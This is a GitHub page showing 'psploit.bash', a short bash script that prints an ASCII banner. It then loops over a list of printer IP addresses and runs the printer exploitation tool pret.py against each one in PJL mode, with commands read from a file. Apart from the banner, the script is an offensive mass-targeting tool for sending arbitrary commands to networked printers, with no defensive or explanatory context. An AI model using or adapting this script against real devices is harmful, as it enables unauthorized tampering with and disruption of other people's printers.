-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathpsploit.bash
More file actions
17 lines (17 loc) · 788 Bytes
/
psploit.bash
File metadata and controls
17 lines (17 loc) · 788 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash
echo " 888 d8b888"
echo " 888 Y8P888"
echo " 888 888"
echo "88888b. .d8888b 88888b. 888 .d88b. 888888888"
echo "888 88b88K 888 88b888d88 88b888888"
echo "888 888 Y8888b.888 888888888 888888888"
echo "888 d88P X88888 d88P888Y88..88P888Y88b."
echo "88888P 88888P'88888P 888 Y88P 888 Y888"
echo "888 888"
echo "888 888"
echo "888 888"
echo " Made by https://twitter.com/SEternalblue"
while read -r line; do
ip="$line"
sudo python2 pret.py $ip pjl -q -i "/root/psploit/command.txt"
done < "/root/psploit/printeri.txt"